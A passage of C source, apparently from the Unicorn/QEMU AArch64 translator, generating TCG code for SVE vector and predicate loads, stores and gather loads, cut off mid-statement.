tcg_gen_qemu_ld_i64(tcg_ctx, t0, addr, midx, MO_LEQ); tcg_gen_add_ptr(tcg_ctx, tp, tcg_ctx->cpu_env, i); tcg_gen_addi_ptr(tcg_ctx, i, i, 8); tcg_gen_st_i64(tcg_ctx, t0, tp, vofs); tcg_temp_free_ptr(tcg_ctx, tp); tcg_gen_brcondi_ptr(tcg_ctx, TCG_COND_LTU, i, len_align, loop); tcg_temp_free_ptr(tcg_ctx, i); } /* Predicate register loads can be any multiple of 2. * Note that we still store the entire 64-bit unit into cpu_env. */ if (len_remain) { tcg_gen_addi_i64(tcg_ctx, addr, cpu_reg_sp(s, rn), imm + len_align); switch (len_remain) { case 2: case 4: case 8: tcg_gen_qemu_ld_i64(tcg_ctx, t0, addr, midx, MO_LE | ctz32(len_remain)); break; case 6: t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, t0, addr, midx, MO_LEUL); tcg_gen_addi_i64(tcg_ctx, addr, addr, 4); tcg_gen_qemu_ld_i64(tcg_ctx, t1, addr, midx, MO_LEUW); tcg_gen_deposit_i64(tcg_ctx, t0, t0, t1, 32, 32); tcg_temp_free_i64(tcg_ctx, t1); break; default: g_assert_not_reached(); } tcg_gen_st_i64(tcg_ctx, t0, tcg_ctx->cpu_env, vofs + len_align); } tcg_temp_free_i64(tcg_ctx, addr); tcg_temp_free_i64(tcg_ctx, t0); } /* Similarly for stores. */ static void do_str(DisasContext *s, uint32_t vofs, int len, int rn, int imm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int len_align = QEMU_ALIGN_DOWN(len, 8); int len_remain = len % 8; int nparts = len / 8 + ctpop8(len_remain); int midx = get_mem_index(s); TCGv_i64 addr, t0; addr = tcg_temp_new_i64(tcg_ctx); t0 = tcg_temp_new_i64(tcg_ctx); /* Note that unpredicated load/store of vector/predicate registers * are defined as a stream of bytes, which equates to little-endian * operations on larger quantities. There is no nice way to force * a little-endian store for aarch64_be-linux-user out of line. * * Attempt to keep code expansion to a minimum by limiting the * amount of unrolling done. */ if (nparts <= 4) { int i; for (i = 0; i < len_align; i += 8) { tcg_gen_ld_i64(tcg_ctx, t0, tcg_ctx->cpu_env, vofs + i); tcg_gen_addi_i64(tcg_ctx, addr, cpu_reg_sp(s, rn), imm + i); tcg_gen_qemu_st_i64(tcg_ctx, t0, addr, midx, MO_LEQ); } } else { TCGLabel *loop = gen_new_label(tcg_ctx); TCGv_ptr t2, i = tcg_const_local_ptr(tcg_ctx, 0); gen_set_label(tcg_ctx, loop); t2 = tcg_temp_new_ptr(tcg_ctx); tcg_gen_add_ptr(tcg_ctx, t2, tcg_ctx->cpu_env, i); tcg_gen_ld_i64(tcg_ctx, t0, t2, vofs); /* Minimize the number of local temps that must be re-read from * the stack each iteration. Instead, re-compute values other * than the loop counter. */ tcg_gen_addi_ptr(tcg_ctx, t2, i, imm); tcg_gen_extu_ptr_i64(tcg_ctx, addr, t2); tcg_gen_add_i64(tcg_ctx, addr, addr, cpu_reg_sp(s, rn)); tcg_temp_free_ptr(tcg_ctx, t2); tcg_gen_qemu_st_i64(tcg_ctx, t0, addr, midx, MO_LEQ); tcg_gen_addi_ptr(tcg_ctx, i, i, 8); tcg_gen_brcondi_ptr(tcg_ctx, TCG_COND_LTU, i, len_align, loop); tcg_temp_free_ptr(tcg_ctx, i); } /* Predicate register stores can be any multiple of 2. */ if (len_remain) { tcg_gen_ld_i64(tcg_ctx, t0, tcg_ctx->cpu_env, vofs + len_align); tcg_gen_addi_i64(tcg_ctx, addr, cpu_reg_sp(s, rn), imm + len_align); switch (len_remain) { case 2: case 4: case 8: tcg_gen_qemu_st_i64(tcg_ctx, t0, addr, midx, MO_LE | ctz32(len_remain)); break; case 6: tcg_gen_qemu_st_i64(tcg_ctx, t0, addr, midx, MO_LEUL); tcg_gen_addi_i64(tcg_ctx, addr, addr, 4); tcg_gen_shri_i64(tcg_ctx, t0, t0, 32); tcg_gen_qemu_st_i64(tcg_ctx, t0, addr, midx, MO_LEUW); break; default: g_assert_not_reached(); } } tcg_temp_free_i64(tcg_ctx, addr); tcg_temp_free_i64(tcg_ctx, t0); } static bool trans_LDR_zri(DisasContext *s, arg_rri *a) { if (sve_access_check(s)) { int size = vec_full_reg_size(s); int off = vec_full_reg_offset(s, a->rd); do_ldr(s, off, size, a->rn, a->imm * size); } return true; } static bool trans_LDR_pri(DisasContext *s, arg_rri *a) { if (sve_access_check(s)) { int size = pred_full_reg_size(s); int off = pred_full_reg_offset(s, a->rd); do_ldr(s, off, size, a->rn, a->imm * size); } return true; } static bool trans_STR_zri(DisasContext *s, arg_rri *a) { if (sve_access_check(s)) { int size = vec_full_reg_size(s); int off = vec_full_reg_offset(s, a->rd); do_str(s, off, size, a->rn, a->imm * size); } return true; } static bool trans_STR_pri(DisasContext *s, arg_rri *a) { if (sve_access_check(s)) { int size = pred_full_reg_size(s); int off = pred_full_reg_offset(s, a->rd); do_str(s, off, size, a->rn, a->imm * size); } return true; } /* *** SVE Memory - Contiguous Load Group */ /* The memory mode of the dtype. */ static const MemOp dtype_mop[16] = { MO_UB, MO_UB, MO_UB, MO_UB, MO_SL, MO_UW, MO_UW, MO_UW, MO_SW, MO_SW, MO_UL, MO_UL, MO_SB, MO_SB, MO_SB, MO_Q }; #define dtype_msz(x) (dtype_mop[x] & MO_SIZE) /* The vector element size of dtype. */ static const uint8_t dtype_esz[16] = { 0, 1, 2, 3, 3, 1, 2, 3, 3, 2, 2, 3, 3, 2, 1, 3 }; static TCGMemOpIdx sve_memopidx(DisasContext *s, int dtype) { return make_memop_idx(s->be_data | dtype_mop[dtype], get_mem_index(s)); } static void do_mem_zpa(DisasContext *s, int zt, int pg, TCGv_i64 addr, int dtype, gen_helper_gvec_mem *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); TCGv_ptr t_pg; TCGv_i32 t_desc; int desc; /* For e.g. LD4, there are not enough arguments to pass all 4 * registers as pointers, so encode the regno into the data field. * For consistency, do this even for LD1. */ desc = sve_memopidx(s, dtype); desc |= zt << MEMOPIDX_SHIFT; desc = simd_desc(vsz, vsz, desc); t_desc = tcg_const_i32(tcg_ctx, desc); t_pg = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, t_pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, pg)); fn(tcg_ctx, tcg_ctx->cpu_env, t_pg, addr, t_desc); tcg_temp_free_ptr(tcg_ctx, t_pg); tcg_temp_free_i32(tcg_ctx, t_desc); } static void do_ld_zpa(DisasContext *s, int zt, int pg, TCGv_i64 addr, int dtype, int nreg) { static gen_helper_gvec_mem * const fns[2][16][4] = { /* Little-endian */ { { gen_helper_sve_ld1bb_r, gen_helper_sve_ld2bb_r, gen_helper_sve_ld3bb_r, gen_helper_sve_ld4bb_r }, { gen_helper_sve_ld1bhu_r, NULL, NULL, NULL }, { gen_helper_sve_ld1bsu_r, NULL, NULL, NULL }, { gen_helper_sve_ld1bdu_r, NULL, NULL, NULL }, { gen_helper_sve_ld1sds_le_r, NULL, NULL, NULL }, { gen_helper_sve_ld1hh_le_r, gen_helper_sve_ld2hh_le_r, gen_helper_sve_ld3hh_le_r, gen_helper_sve_ld4hh_le_r }, { gen_helper_sve_ld1hsu_le_r, NULL, NULL, NULL }, { gen_helper_sve_ld1hdu_le_r, NULL, NULL, NULL }, { gen_helper_sve_ld1hds_le_r, NULL, NULL, NULL }, { gen_helper_sve_ld1hss_le_r, NULL, NULL, NULL }, { gen_helper_sve_ld1ss_le_r, gen_helper_sve_ld2ss_le_r, gen_helper_sve_ld3ss_le_r, gen_helper_sve_ld4ss_le_r }, { gen_helper_sve_ld1sdu_le_r, NULL, NULL, NULL }, { gen_helper_sve_ld1bds_r, NULL, NULL, NULL }, { gen_helper_sve_ld1bss_r, NULL, NULL, NULL }, { gen_helper_sve_ld1bhs_r, NULL, NULL, NULL }, { gen_helper_sve_ld1dd_le_r, gen_helper_sve_ld2dd_le_r, gen_helper_sve_ld3dd_le_r, gen_helper_sve_ld4dd_le_r } }, /* Big-endian */ { { gen_helper_sve_ld1bb_r, gen_helper_sve_ld2bb_r, gen_helper_sve_ld3bb_r, gen_helper_sve_ld4bb_r }, { gen_helper_sve_ld1bhu_r, NULL, NULL, NULL }, { gen_helper_sve_ld1bsu_r, NULL, NULL, NULL }, { gen_helper_sve_ld1bdu_r, NULL, NULL, NULL }, { gen_helper_sve_ld1sds_be_r, NULL, NULL, NULL }, { gen_helper_sve_ld1hh_be_r, gen_helper_sve_ld2hh_be_r, gen_helper_sve_ld3hh_be_r, gen_helper_sve_ld4hh_be_r }, { gen_helper_sve_ld1hsu_be_r, NULL, NULL, NULL }, { gen_helper_sve_ld1hdu_be_r, NULL, NULL, NULL }, { gen_helper_sve_ld1hds_be_r, NULL, NULL, NULL }, { gen_helper_sve_ld1hss_be_r, NULL, NULL, NULL }, { gen_helper_sve_ld1ss_be_r, gen_helper_sve_ld2ss_be_r, gen_helper_sve_ld3ss_be_r, gen_helper_sve_ld4ss_be_r }, { gen_helper_sve_ld1sdu_be_r, NULL, NULL, NULL }, { gen_helper_sve_ld1bds_r, NULL, NULL, NULL }, { gen_helper_sve_ld1bss_r, NULL, NULL, NULL }, { gen_helper_sve_ld1bhs_r, NULL, NULL, NULL }, { gen_helper_sve_ld1dd_be_r, gen_helper_sve_ld2dd_be_r, gen_helper_sve_ld3dd_be_r, gen_helper_sve_ld4dd_be_r } } }; gen_helper_gvec_mem *fn = fns[s->be_data == MO_BE][dtype][nreg]; /* While there are holes in the table, they are not * accessible via the instruction encoding. */ assert(fn != NULL); do_mem_zpa(s, zt, pg, addr, dtype, fn); } static bool trans_LD_zprr(DisasContext *s, arg_rprr_load *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->rm == 31) { return false; } if (sve_access_check(s)) { TCGv_i64 addr = new_tmp_a64(s); tcg_gen_shli_i64(tcg_ctx, addr, cpu_reg(s, a->rm), dtype_msz(a->dtype)); tcg_gen_add_i64(tcg_ctx, addr, addr, cpu_reg_sp(s, a->rn)); do_ld_zpa(s, a->rd, a->pg, addr, a->dtype, a->nreg); } return true; } static bool trans_LD_zpri(DisasContext *s, arg_rpri_load *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { int vsz = vec_full_reg_size(s); int elements = vsz >> dtype_esz[a->dtype]; TCGv_i64 addr = new_tmp_a64(s); tcg_gen_addi_i64(tcg_ctx, addr, cpu_reg_sp(s, a->rn), (a->imm * elements * (a->nreg + 1)) << dtype_msz(a->dtype)); do_ld_zpa(s, a->rd, a->pg, addr, a->dtype, a->nreg); } return true; } static bool trans_LDFF1_zprr(DisasContext *s, arg_rprr_load *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_mem * const fns[2][16] = { /* Little-endian */ { gen_helper_sve_ldff1bb_r, gen_helper_sve_ldff1bhu_r, gen_helper_sve_ldff1bsu_r, gen_helper_sve_ldff1bdu_r, gen_helper_sve_ldff1sds_le_r, gen_helper_sve_ldff1hh_le_r, gen_helper_sve_ldff1hsu_le_r, gen_helper_sve_ldff1hdu_le_r, gen_helper_sve_ldff1hds_le_r, gen_helper_sve_ldff1hss_le_r, gen_helper_sve_ldff1ss_le_r, gen_helper_sve_ldff1sdu_le_r, gen_helper_sve_ldff1bds_r, gen_helper_sve_ldff1bss_r, gen_helper_sve_ldff1bhs_r, gen_helper_sve_ldff1dd_le_r }, /* Big-endian */ { gen_helper_sve_ldff1bb_r, gen_helper_sve_ldff1bhu_r, gen_helper_sve_ldff1bsu_r, gen_helper_sve_ldff1bdu_r, gen_helper_sve_ldff1sds_be_r, gen_helper_sve_ldff1hh_be_r, gen_helper_sve_ldff1hsu_be_r, gen_helper_sve_ldff1hdu_be_r, gen_helper_sve_ldff1hds_be_r, gen_helper_sve_ldff1hss_be_r, gen_helper_sve_ldff1ss_be_r, gen_helper_sve_ldff1sdu_be_r, gen_helper_sve_ldff1bds_r, gen_helper_sve_ldff1bss_r, gen_helper_sve_ldff1bhs_r, gen_helper_sve_ldff1dd_be_r }, }; if (sve_access_check(s)) { TCGv_i64 addr = new_tmp_a64(s); tcg_gen_shli_i64(tcg_ctx, addr, cpu_reg(s, a->rm), dtype_msz(a->dtype)); tcg_gen_add_i64(tcg_ctx, addr, addr, cpu_reg_sp(s, a->rn)); do_mem_zpa(s, a->rd, a->pg, addr, a->dtype, fns[s->be_data == MO_BE][a->dtype]); } return true; } static bool trans_LDNF1_zpri(DisasContext *s, arg_rpri_load *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_mem * const fns[2][16] = { /* Little-endian */ { gen_helper_sve_ldnf1bb_r, gen_helper_sve_ldnf1bhu_r, gen_helper_sve_ldnf1bsu_r, gen_helper_sve_ldnf1bdu_r, gen_helper_sve_ldnf1sds_le_r, gen_helper_sve_ldnf1hh_le_r, gen_helper_sve_ldnf1hsu_le_r, gen_helper_sve_ldnf1hdu_le_r, gen_helper_sve_ldnf1hds_le_r, gen_helper_sve_ldnf1hss_le_r, gen_helper_sve_ldnf1ss_le_r, gen_helper_sve_ldnf1sdu_le_r, gen_helper_sve_ldnf1bds_r, gen_helper_sve_ldnf1bss_r, gen_helper_sve_ldnf1bhs_r, gen_helper_sve_ldnf1dd_le_r }, /* Big-endian */ { gen_helper_sve_ldnf1bb_r, gen_helper_sve_ldnf1bhu_r, gen_helper_sve_ldnf1bsu_r, gen_helper_sve_ldnf1bdu_r, gen_helper_sve_ldnf1sds_be_r, gen_helper_sve_ldnf1hh_be_r, gen_helper_sve_ldnf1hsu_be_r, gen_helper_sve_ldnf1hdu_be_r, gen_helper_sve_ldnf1hds_be_r, gen_helper_sve_ldnf1hss_be_r, gen_helper_sve_ldnf1ss_be_r, gen_helper_sve_ldnf1sdu_be_r, gen_helper_sve_ldnf1bds_r, gen_helper_sve_ldnf1bss_r, gen_helper_sve_ldnf1bhs_r, gen_helper_sve_ldnf1dd_be_r }, }; if (sve_access_check(s)) { int vsz = vec_full_reg_size(s); int elements = vsz >> dtype_esz[a->dtype]; int off = (a->imm * elements) << dtype_msz(a->dtype); TCGv_i64 addr = new_tmp_a64(s); tcg_gen_addi_i64(tcg_ctx, addr, cpu_reg_sp(s, a->rn), off); do_mem_zpa(s, a->rd, a->pg, addr, a->dtype, fns[s->be_data == MO_BE][a->dtype]); } return true; } static void do_ldrq(DisasContext *s, int zt, int pg, TCGv_i64 addr, int msz) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_mem * const fns[2][4] = { { gen_helper_sve_ld1bb_r, gen_helper_sve_ld1hh_le_r, gen_helper_sve_ld1ss_le_r, gen_helper_sve_ld1dd_le_r }, { gen_helper_sve_ld1bb_r, gen_helper_sve_ld1hh_be_r, gen_helper_sve_ld1ss_be_r, gen_helper_sve_ld1dd_be_r }, }; unsigned vsz = vec_full_reg_size(s); TCGv_ptr t_pg; TCGv_i32 t_desc; int desc, poff; /* Load the first quadword using the normal predicated load helpers. */ desc = sve_memopidx(s, msz_dtype(s, msz)); desc |= zt << MEMOPIDX_SHIFT; desc = simd_desc(16, 16, desc); t_desc = tcg_const_i32(tcg_ctx, desc); poff = pred_full_reg_offset(s, pg); if (vsz > 16) { /* * Zero-extend the first 16 bits of the predicate into a temporary. * This avoids triggering an assert making sure we don't have bits * set within a predicate beyond VQ, but we have lowered VQ to 1 * for this load operation. */ TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); #ifdef HOST_WORDS_BIGENDIAN poff += 6; #endif tcg_gen_ld16u_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, poff); poff = offsetof(CPUARMState, vfp.preg_tmp); tcg_gen_st_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, poff); tcg_temp_free_i64(tcg_ctx, tmp); } t_pg = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, t_pg, tcg_ctx->cpu_env, poff); fns[s->be_data == MO_BE][msz](tcg_ctx, tcg_ctx->cpu_env, t_pg, addr, t_desc); tcg_temp_free_ptr(tcg_ctx, t_pg); tcg_temp_free_i32(tcg_ctx, t_desc); /* Replicate that first quadword. */ if (vsz > 16) { unsigned dofs = vec_full_reg_offset(s, zt); tcg_gen_gvec_dup_mem(tcg_ctx, 4, dofs + 16, dofs, vsz - 16, vsz - 16); } } static bool trans_LD1RQ_zprr(DisasContext *s, arg_rprr_load *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->rm == 31) { return false; } if (sve_access_check(s)) { int msz = dtype_msz(a->dtype); TCGv_i64 addr = new_tmp_a64(s); tcg_gen_shli_i64(tcg_ctx, addr, cpu_reg(s, a->rm), msz); tcg_gen_add_i64(tcg_ctx, addr, addr, cpu_reg_sp(s, a->rn)); do_ldrq(s, a->rd, a->pg, addr, msz); } return true; } static bool trans_LD1RQ_zpri(DisasContext *s, arg_rpri_load *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 addr = new_tmp_a64(s); tcg_gen_addi_i64(tcg_ctx, addr, cpu_reg_sp(s, a->rn), a->imm * 16); do_ldrq(s, a->rd, a->pg, addr, dtype_msz(a->dtype)); } return true; } /* Load and broadcast element. */ static bool trans_LD1R_zpri(DisasContext *s, arg_rpri_load *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sve_access_check(s)) { return true; } unsigned vsz = vec_full_reg_size(s); unsigned psz = pred_full_reg_size(s); unsigned esz = dtype_esz[a->dtype]; unsigned msz = dtype_msz(a->dtype); TCGLabel *over = gen_new_label(tcg_ctx); TCGv_i64 temp; /* If the guarding predicate has no bits set, no load occurs. */ if (psz <= 8) { /* Reduce the pred_esz_masks value simply to reduce the * size of the code generated here. */ uint64_t psz_mask = MAKE_64BIT_MASK(0, psz * 8); temp = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, temp, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->pg)); tcg_gen_andi_i64(tcg_ctx, temp, temp, pred_esz_masks[esz] & psz_mask); tcg_gen_brcondi_i64(tcg_ctx, TCG_COND_EQ, temp, 0, over); tcg_temp_free_i64(tcg_ctx, temp); } else { TCGv_i32 t32 = tcg_temp_new_i32(tcg_ctx); find_last_active(s, t32, esz, a->pg); tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_LT, t32, 0, over); tcg_temp_free_i32(tcg_ctx, t32); } /* Load the data. */ temp = tcg_temp_new_i64(tcg_ctx); tcg_gen_addi_i64(tcg_ctx, temp, cpu_reg_sp(s, a->rn), a->imm << msz); tcg_gen_qemu_ld_i64(tcg_ctx, temp, temp, get_mem_index(s), s->be_data | dtype_mop[a->dtype]); /* Broadcast to *all* elements. */ tcg_gen_gvec_dup_i64(tcg_ctx, esz, vec_full_reg_offset(s, a->rd), vsz, vsz, temp); tcg_temp_free_i64(tcg_ctx, temp); /* Zero the inactive elements. */ gen_set_label(tcg_ctx, over); do_movz_zpz(s, a->rd, a->rd, a->pg, esz); return true; } static void do_st_zpa(DisasContext *s, int zt, int pg, TCGv_i64 addr, int msz, int esz, int nreg) { static gen_helper_gvec_mem * const fn_single[2][4][4] = { { { gen_helper_sve_st1bb_r, gen_helper_sve_st1bh_r, gen_helper_sve_st1bs_r, gen_helper_sve_st1bd_r }, { NULL, gen_helper_sve_st1hh_le_r, gen_helper_sve_st1hs_le_r, gen_helper_sve_st1hd_le_r }, { NULL, NULL, gen_helper_sve_st1ss_le_r, gen_helper_sve_st1sd_le_r }, { NULL, NULL, NULL, gen_helper_sve_st1dd_le_r } }, { { gen_helper_sve_st1bb_r, gen_helper_sve_st1bh_r, gen_helper_sve_st1bs_r, gen_helper_sve_st1bd_r }, { NULL, gen_helper_sve_st1hh_be_r, gen_helper_sve_st1hs_be_r, gen_helper_sve_st1hd_be_r }, { NULL, NULL, gen_helper_sve_st1ss_be_r, gen_helper_sve_st1sd_be_r }, { NULL, NULL, NULL, gen_helper_sve_st1dd_be_r } }, }; static gen_helper_gvec_mem * const fn_multiple[2][3][4] = { { { gen_helper_sve_st2bb_r, gen_helper_sve_st2hh_le_r, gen_helper_sve_st2ss_le_r, gen_helper_sve_st2dd_le_r }, { gen_helper_sve_st3bb_r, gen_helper_sve_st3hh_le_r, gen_helper_sve_st3ss_le_r, gen_helper_sve_st3dd_le_r }, { gen_helper_sve_st4bb_r, gen_helper_sve_st4hh_le_r, gen_helper_sve_st4ss_le_r, gen_helper_sve_st4dd_le_r } }, { { gen_helper_sve_st2bb_r, gen_helper_sve_st2hh_be_r, gen_helper_sve_st2ss_be_r, gen_helper_sve_st2dd_be_r }, { gen_helper_sve_st3bb_r, gen_helper_sve_st3hh_be_r, gen_helper_sve_st3ss_be_r, gen_helper_sve_st3dd_be_r }, { gen_helper_sve_st4bb_r, gen_helper_sve_st4hh_be_r, gen_helper_sve_st4ss_be_r, gen_helper_sve_st4dd_be_r } }, }; gen_helper_gvec_mem *fn; int be = s->be_data == MO_BE; if (nreg == 0) { /* ST1 */ fn = fn_single[be][msz][esz]; } else { /* ST2, ST3, ST4 -- msz == esz, enforced by encoding */ assert(msz == esz); fn = fn_multiple[be][nreg - 1][msz]; } assert(fn != NULL); do_mem_zpa(s, zt, pg, addr, msz_dtype(s, msz), fn); } static bool trans_ST_zprr(DisasContext *s, arg_rprr_store *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->rm == 31 || a->msz > a->esz) { return false; } if (sve_access_check(s)) { TCGv_i64 addr = new_tmp_a64(s); tcg_gen_shli_i64(tcg_ctx, addr, cpu_reg(s, a->rm), a->msz); tcg_gen_add_i64(tcg_ctx, addr, addr, cpu_reg_sp(s, a->rn)); do_st_zpa(s, a->rd, a->pg, addr, a->msz, a->esz, a->nreg); } return true; } static bool trans_ST_zpri(DisasContext *s, arg_rpri_store *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->msz > a->esz) { return false; } if (sve_access_check(s)) { int vsz = vec_full_reg_size(s); int elements = vsz >> a->esz; TCGv_i64 addr = new_tmp_a64(s); tcg_gen_addi_i64(tcg_ctx, addr, cpu_reg_sp(s, a->rn), (a->imm * elements * (a->nreg + 1)) << a->msz); do_st_zpa(s, a->rd, a->pg, addr, a->msz, a->esz, a->nreg); } return true; } /* *** SVE gather loads / scatter stores */ static void do_mem_zpz(DisasContext *s, int zt, int pg, int zm, int scale, TCGv_i64 scalar, int msz, gen_helper_gvec_mem_scatter *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); TCGv_ptr t_zm = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr t_pg = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr t_zt = tcg_temp_new_ptr(tcg_ctx); TCGv_i32 t_desc; int desc; desc = sve_memopidx(s, msz_dtype(s, msz)); desc |= scale << MEMOPIDX_SHIFT; desc = simd_desc(vsz, vsz, desc); t_desc = tcg_const_i32(tcg_ctx, desc); tcg_gen_addi_ptr(tcg_ctx, t_pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, pg)); tcg_gen_addi_ptr(tcg_ctx, t_zm, tcg_ctx->cpu_env, vec_full_reg_offset(s, zm)); tcg_gen_addi_ptr(tcg_ctx, t_zt, tcg_ctx->cpu_env, vec_full_reg_offset(s, zt)); fn(tcg_ctx, tcg_ctx->cpu_env, t_zt, t_pg, t_zm, scalar, t_desc); tcg_temp_free_ptr(tcg_ctx, t_zt); tcg_temp_free_ptr(tcg_ctx, t_zm); tcg_temp_free_ptr(tcg_ctx, t_pg); tcg_temp_free_i32(tcg_ctx, t_desc); } /* Indexed by [be][ff][xs][u][msz]. */ static gen_helper_gvec_mem_scatter * const gather_load_fn32[2][2][2][2][3] = { /* Little-endian */ { { { { gen_helper_sve_ldbss_zsu, gen_helper_sve_ldhss_le_zsu, NULL, }, { gen_helper_sve_ldbsu_zsu, gen_helper_sve_ldhsu_le_zsu, gen_helper_sve_ldss_le_zsu, } }, { { gen_helper_sve_ldbss_zss, gen_helper_sve_ldhss_le_zss, NULL, }, { gen_helper_sve_ldbsu_zss, gen_helper_sve_ldhsu_le_zss, gen_helper_sve_ldss_le_zss, } } }, /* First-fault */ { { { gen_helper_sve_ldffbss_zsu, gen_helper_sve_ldffhss_le_zsu, NULL, }, { gen_helper_sve_ldffbsu_zsu, gen_helper_sve_ldffhsu_le_zsu, gen_helper_sve_ldffss_le_zsu, } }, { { gen_helper_sve_ldffbss_zss, gen_helper_sve_ldffhss_le_zss, NULL, }, { gen_helper_sve_ldffbsu_zss, gen_helper_sve_ldffhsu_le_zss, gen_helper_sve_ldffss_le_zss, } } } }, /* Big-endian */ { { { { gen_helper_sve_ldbss_zsu, gen_helper_sve_ldhss_be_zsu, NULL, }, { gen_helper_sve_ldbsu_zsu, gen_helper_sve_ldhsu_be_zsu, gen_helper_sve_ldss_be_zsu, } }, { { gen_helper_sve_ldbss_zss, gen_helper_sve_ldhss_be_zss, NULL, }, { gen_helper_sve_ldbsu_zss, gen_helper_sve_ldhsu_be_zss, gen_helper_sve_ldss_be_zss, } } }, /* First-fault */ { { { gen_helper_sve_ldffbss_zsu, gen_helper_sve_ldffhss_be_zsu, NULL, }, { gen_helper_sve_ldffbsu_zsu, gen_helper_sve_ldffhsu_be_zsu, gen_helper_sve_ldffss_be_zsu, } }, { { gen_helper_sve_ldffbss_zss, gen_helper_sve_ldffhss_be_zss, NULL, }, { gen_helper_sve_ldffbsu_zss, gen_helper_sve_ldffhsu_be_zss, gen_helper_sve_ldffss_be_zss, } } } }, }; /* Note that we overload xs=2 to indicate 64-bit offset. */ static gen_helper_gvec_mem_scatter * const gather_load_fn64[2][2][3][2][4] = { /* Little-endian */ { { { { gen_helper_sve_ldbds_zsu, gen_helper_sve_ldhds_le_zsu, gen_helper_sve_ldsds_le_zsu, NULL, }, { gen_helper_sve_ldbdu_zsu, gen_helper_sve_ldhdu_le_zsu, gen_helper_sve_ldsdu_le_zsu, gen_helper_sve_lddd_le_zsu, } }, { { gen_helper_sve_ldbds_zss, gen_helper_sve_ldhds_le_zss, gen_helper_sve_ldsds_le_zss, NULL, }, { gen_helper_sve_ldbdu_zss, gen_helper_sve_ldhdu_le_zss, gen_helper_sve_ldsdu_le_zss, gen_helper_sve_lddd_le_zss, } }, { { gen_helper_sve_ldbds_zd, gen_helper_sve_ldhds_le_zd, gen_helper_sve_ldsds_le_zd, NULL, }, { gen_helper_sve_ldbdu_zd, gen_helper_sve_ldhdu_le_zd, gen_helper_sve_ldsdu_le_zd, gen_helper_sve_lddd_le_zd, } } }, /* First-fault */ { { { gen_helper_sve_ldffbds_zsu, gen_helper_sve_ldffhds_le_zsu, gen_helper_sve_ldffsds_le_zsu, NULL, }, { gen_helper_sve_ldffbdu_zsu, gen_helper_sve_ldffhdu_le_zsu, gen_helper_sve_ldffsdu_le_zsu, gen_helper_sve_ldffdd_le_zsu, } }, { { gen_helper_sve_ldffbds_zss, gen_helper_sve_ldffhds_le_zss, gen_helper_sve_ldffsds_le_zss, NULL, }, { gen_helper_sve_ldffbdu_zss, gen_helper_sve_ldffhdu_le_zss, gen_helper_sve_ldffsdu_le_zss, gen_helper_sve_ldffdd_le_zss, } }, { { gen_helper_sve_ldffbds_zd, gen_helper_sve_ldffhds_le_zd, gen_helper_sve_ldffsds_le_zd, NULL, }, { gen_helper_sve_ldffbdu_zd, gen_helper_sve_ldffhdu_le_zd, gen_helper_sve_ldffsdu_le_zd, gen_helper_sve_ldffdd_le_zd, } } } }, /* Big-endian */ { { { { gen_helper_sve_ldbds_zsu, gen_helper_sve_ldhds_be_zsu, gen_helper_sve_ldsds_be_zsu, NULL, }, { gen_helper_sve_ldbdu_zsu, gen_helper_sve_ldhdu_be_zsu, gen_helper_sve_ldsdu_be_zsu, gen_helper_sve_lddd_be_zsu, } }, { { gen_helper_sve_ldbds_zss, gen_helper_sve_ldhds_be_zss, gen_helper_sve_ldsds_be_zss, NULL, }, { gen_helper_sve_ldbdu_zss, gen_helper_sve_ldhdu_be_zss, gen_helper_sve_ldsdu_be_zss, gen_helper_sve_lddd_be_zss, } }, { { gen_helper_sve_ldbds_zd, gen_helper_sve_ldhds_be_zd, gen_helper_sve_ldsds_be_zd, NULL, }, { gen_helper_sve_ldbdu_zd, gen_helper_sve_ldhdu_be_zd, gen_helper_sve_ldsdu_be_zd, gen_helper_sve_lddd_be_zd, } } }, /* First-fault */ { { { gen_helper_sve_ldffbds_zsu, gen_helper_sve_ldffhds_be_zsu, gen_helper_sve_ldffsds_be_zsu, NULL, }, { gen_helper_sve_ldffbdu_zsu, gen_helper_sve_ldffhdu_be_zsu, gen_helper_sve_ldffsdu_be_zsu, gen_helper_sve_ldffdd_be_zsu, } }, { { gen_helper_sve_ldffbds_zss, gen_helper_sve_ldffhds_be_zss, gen_helper_sve_ldffsds_be_zss, NULL, }, { gen_helper_sve_ldffbdu_zss, gen_helper_sve_ldffhdu_be_zss, gen_helper_sve_ldffsdu_be_zss, gen_helper_sve_ldffdd_be_zss, } }, { { gen_helper_sve_ldffbds_zd, gen_helper_sve_ldffhds_be_zd, gen_helper_sve_ldffsds_be_zd, NULL, }, { gen_helper_sve_ldffbdu_zd, gen_helper_sve_ldffhdu_be_zd, gen_helper_sve_ldffsdu_be_zd, gen_helper_sve_ldffdd_be_zd, } } } }, }; static bool trans_LD1_zprz(DisasContext *s, arg_LD1_zprz *a) { gen_helper_gvec_mem_scatter *fn = NULL; int be = s->be_data == MO_BE; if (!sve_access_check(s)) { return true; } switch (a->esz) { case MO_32: fn = 